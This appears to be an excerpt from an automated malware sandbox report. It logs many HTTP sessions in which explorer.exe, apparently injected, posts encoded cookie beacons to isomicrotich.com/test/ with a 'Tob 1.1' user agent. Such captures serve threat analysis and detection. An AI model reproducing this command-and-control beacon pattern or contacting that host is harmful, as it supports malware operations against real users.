                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFg5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:46:45 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:45 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AMhGiMHIzDyech5ItS5JxMbG3RuyyVhrqUN%2FzoY7WwufzZUR3jyWjXq%2BVorBFy0maQ4c9BNfL%2B6nuFjijcAJn0glcXnYauopq5IKQ98WXu8Onivk6DUNqzWWQOv13x%2F%2BMKee"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf18c43fde4257-EWR
                                                                                                                                                                                                                                                2024-10-03 18:46:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                18192.168.2.762286188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:46:46 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFg6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:46:47 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:46 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wqxQC3SB13x3%2B%2BXOmnB03PzMKvRGUc6UZ1My7SaTSMFoCEeQXke8IrJSqbKD2TpCtmCf5q2faWYxfGEHSjBNorpADFhVEmWxhcsL7hrdrqGQOKBaeQfSRld2UhbXw5ZhIge2"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf18ccdb477ce2-EWR
                                                                                                                                                                                                                                                2024-10-03 18:46:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                19192.168.2.762289188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:46:47 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFg6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:46:48 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:48 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=emK9rVHaVqouZA1WR13kNKIuyHUq%2BJD%2Bn2L6p5URF50KlAgPSxq5%2F%2BAhiEQbUK%2BngzqdZQBZzxX15Iw2tX48N6s9Gr3YiaKzZsp9xesFdIHTJxbTlKFzL1K2vhGrXOiPwoyE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf18d558771875-EWR
                                                                                                                                                                                                                                                2024-10-03 18:46:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                20192.168.2.762290188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:46:48 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFj4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:46:49 UTC546INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:49 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bs06lZZK6kJzoKFZ2KrN8ikWlZvAvdIc7cH2ybTO16ajdmtdvwNL98cFe9st4ba1pV4HLsjUVHGw128L%2Bhh2DzQzvVtlGNMfc1ZVcjFd3Fi%2FppCT6Jb%2BbGVQJJB3k63JTFs%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf18dbe94578db-EWR
                                                                                                                                                                                                                                                2024-10-03 18:46:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                21192.168.2.762291188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:46:49 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFj4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:46:50 UTC544INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:50 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F4kb6TaY7SiuTTJct9riXpaM8%2BJTYOqpQ6yWU2jaZV7s7%2FyFvVZbjMHyP4eE%2BGYUQAcCRGt5VXJn1yjmtVaTRxJPHpk2xbVDrCfhxHEaq9iUYEnn9XOKeAJ5pdsYJyOM%2Bfvt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf18e25919434f-EWR
                                                                                                                                                                                                                                                2024-10-03 18:46:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                22192.168.2.762293188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:46:51 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFj4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:46:52 UTC544INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:52 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bvBuZXOVCAPxWVOxS%2BXi7MEu24k4h6K17mwZeyKiK%2FDj7RgkRdZWaMzzSq%2Bakq1xOS9La6ROBrgfYkJKh%2BSABH8FPIC5XIj7oz01LL9auGC5Kf3siXxuyiOTgsYzdWv6JZ7P"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf18eea9178c60-EWR
                                                                                                                                                                                                                                                2024-10-03 18:46:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                23192.168.2.762296188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:46:53 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFj4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:46:53 UTC573INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:53 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hqAk%2BVhXn61Uex4%2B41u%2Bf2C9sGQs9rs4c5zDcCsqdBMs6uOcTyjXyv1OHOZZwuqnLXWRd%2FMB6lyQBkfL95NC1zZkSvKpcSsR3s5eQI67K%2F87O%2BsPQjH%2FlvG4O3U0uxBbZcwK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf18f86a2e8c75-EWR
                                                                                                                                                                                                                                                2024-10-03 18:46:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                24192.168.2.762297188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:46:54 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFj5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:46:54 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:54 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zu%2BviSj6EQF6LUHz5e6jeyAvLBmCB%2FMHmzPQL2yZcXvFbfxkfEt7k2KsuC5OVFq4ho3TQpXfr%2FvrgdEQHbads%2FmdWHTTC6vjSaPJmZKpurhUKuF9QEw783UOO4j2%2FjrVBlnr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf18fefb504263-EWR
                                                                                                                                                                                                                                                2024-10-03 18:46:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                25192.168.2.762300188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:46:56 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFj5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:46:57 UTC536INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:57 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ACLu3E884Qd9mCfxTmcBLI1ksHeIppE3PslEhKTkwZX2avIcKKNdZ2L3FFezlE8p4yc5RzFS0vr1uFYHesFXlq7zrcwmls79k49IYZRhhzFf5G2wSzcF7rZMNL8lh6iRGY4Q"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19095bb51780-EWR
                                                                                                                                                                                                                                                2024-10-03 18:46:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                26192.168.2.762304188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:46:57 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFj5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:46:58 UTC567INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:58 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c3ygFduRqc6pJS1Sz4cLEEVF88qfBMI540h9zliDszEzTGa2XwdVTzQ9l%2F8ek2qL1bPqGN9MF7E14p4QbzDqGDWTr5%2FxMzA9d6%2FE%2FIGSxeAdsYigESY1k7TMIvE5Jp069XPI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1913095a0f78-EWR
                                                                                                                                                                                                                                                2024-10-03 18:46:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                27192.168.2.762306188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:46:58 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFj5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:46:59 UTC567INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:59 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xMyZmhnhnN9iruILt%2BByXu8sigSMqeGAL1ufPz4%2BTtKecnWIcrnsHU4ny9SWWEw2PI3Fg9hWzoPyyWCJwWJ96F0VEfc5IFzA7Vr2cAOwtamb%2BoQean5SpCAV4qzP8rnk8%2FYZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1919a9f0c33e-EWR
                                                                                                                                                                                                                                                2024-10-03 18:46:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                28192.168.2.762307188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:46:59 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFj6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:00 UTC542INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:00 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CWJaer5hKLrDkOhn%2FHfULBBdgYu3THwh0hvMakflpL6Q6YZ8eX8H%2FZrBlXv1Mr55a5734OWNWdomcf0N0OWUV0DPuJbDyTZFTMKJLFEJAEPlwFcgNTPESqAs6%2FnZfqspdWDl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19201c7e7cf3-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                29192.168.2.762308188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:00 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFj6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:01 UTC565INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:01 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
